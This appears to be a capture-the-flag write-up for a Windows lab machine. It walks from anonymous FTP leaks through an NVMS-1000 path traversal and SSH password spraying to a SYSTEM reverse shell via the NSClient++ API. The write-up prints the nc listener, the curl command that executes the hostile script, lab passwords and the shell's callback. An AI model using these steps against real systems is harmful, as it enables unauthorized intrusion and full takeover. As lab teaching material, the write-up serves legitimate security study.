Easy Windows machine that chains four misconfigurations together. Anonymous FTP leaks an internal note
revealing that Passwords.txt lives on Nathan's Desktop. NVMS-1000's unauthenticated path
traversal (CVE-2019-20085) reads that file without any credentials. Password spraying over SSH lands a
shell as nadine. NSClient++ — a monitoring agent running as NT AUTHORITY\SYSTEM
— stores its API password in plaintext; forwarding its port via SSH tunnel and registering a malicious
script through the REST API yields a SYSTEM shell.
User Flag
2687b43660xxxxxxxxxxxxxxxxxxxxxx
Root Flag
27da63c023xxxxxxxxxxxxxxxxxxxxxx
01Reconnaissance
Full port scan surfaces anonymous FTP, SSH, HTTP (NVMS-1000), SMB, and an HTTPS service on 8443 (NSClient++).
nmap
$nmap-sC -sV -p- --min-rate 5000 -oNnmap_full.txt10.129.227.7721/tcp open ftp Microsoft ftpd|_ftp-anon: Anonymous FTP login allowed22/tcp open ssh OpenSSH for_Windows_8.080/tcp open http redirects to /Pages/login.htm (NVMS-1000)445/tcp open microsoft-ds Windows Server8443/tcp open https NSClient++ web UI
NVMS-1000 is a network video surveillance management system by TVT with a known unauthenticated directory traversal (CVE-2019-20085) that reads arbitrary files without credentials.
NSClient++ is a Windows monitoring agent similar to Nagios NRPE. It runs as NT AUTHORITY\SYSTEM and can execute external scripts via a REST API — a classic privesc target.
02FTP Enumeration
Anonymous FTP allows browsing both user home directories. Two files leak the entire attack path.
ftp — anonymous login
$ftp -p10.129.227.77# Username: anonymous Password: (blank)ftp> cd Users/Nadine
ftp> get Confidential.txt
ftp> cd ../Nathan
ftp> get "Notes to do.txt"
Confidential.txt
Nathan,I left your Passwords.txt file on your Desktop. Please remove this onceyou have edited it yourself and place it back into the secure folder.Regards, Nadine
Notes to do.txt
1) Change the password for NVMS - Complete2) Lock down the NSClient Access - Complete3) Upload the passwords4) Remove public access to NVMS <-- NOT done5) Place the secret files in SharePoint
key insight:Passwords.txt is on Nathan's Desktop, and NVMS public access is still open (item 4 incomplete). We can use the NVMS traversal to read the file unauthenticated.
03Directory Traversal — CVE-2019-20085
NVMS-1000 fails to sanitize ../ sequences in GET requests, allowing unauthenticated file reads anywhere on the filesystem. Standard Python exploit scripts silently normalize the traversal sequences away — use curl --path-as-is to send the raw path to the server.
Why --path-as-is? By default curl (and most HTTP libraries) normalize URLs and strip ../ before sending. This flag disables normalization and sends the raw path exactly as written — required for the traversal payload to reach the server intact.
04Foothold — SSH as Nadine
Spray the recovered passwords against both known users over SSH.
finding: Nathan's own passwords file — but Nadine reused one of them. Nathan's account didn't match.
SSH → user flag
$sshnadine@10.129.227.77# Password: L1k3B1gBut7s@W0rknadine@SERVMON C:\Users\Nadine\Desktop> type user.txt
2687b43660xxxxxxxxxxxxxxxxxxxxxx
user flag obtained.
05Privilege Escalation — NSClient++ → SYSTEM
NSClient++ is bound to 0.0.0.0:8443 but its config restricts API connections to 127.0.0.1 only.
The config also stores the API password in plaintext. We bypass the localhost restriction with an SSH tunnel,
then use the REST API to register and execute a reverse shell script — the service runs as SYSTEM.
Step 1 — Read nsclient.ini
nsclient.ini — credentials
nadine> type "C:\Program Files\NSClient++\nsclient.ini"password = ew2x6SsGTxjRwXOTallowed hosts = 127.0.0.1
TLS gotcha: NSClient++ 0.5.2 uses old TLS. Pass -k (skip cert verification) and --tlsv1.0. Run all API calls from Kali — the Windows curl inside the SSH session uses schannel and also fails on SSL errors.
# terminal 1 — listener$nc -lvnp 4444
# terminal 2 — execute registered script$curl-k --tlsv1.0 -uadmin:ew2x6SsGTxjRwXOT \
"https://127.0.0.1:8443/api/v1/queries/evil/commands/execute?time=3m"# shell received:connect to [10.10.14.78] from (UNKNOWN) [10.129.227.77]C:\Program Files\NSClient++> whoami
nt authority\system
Why does this work? NSClient++ runs as a Windows service under NT AUTHORITY\SYSTEM. When it executes the registered script, the spawned process inherits that SYSTEM context — no further exploitation needed.
06Root Flag
root flag
C:\Program Files\NSClient++> type C:\Users\Administrator\Desktop\root.txt
27da63c023xxxxxxxxxxxxxxxxxxxxxx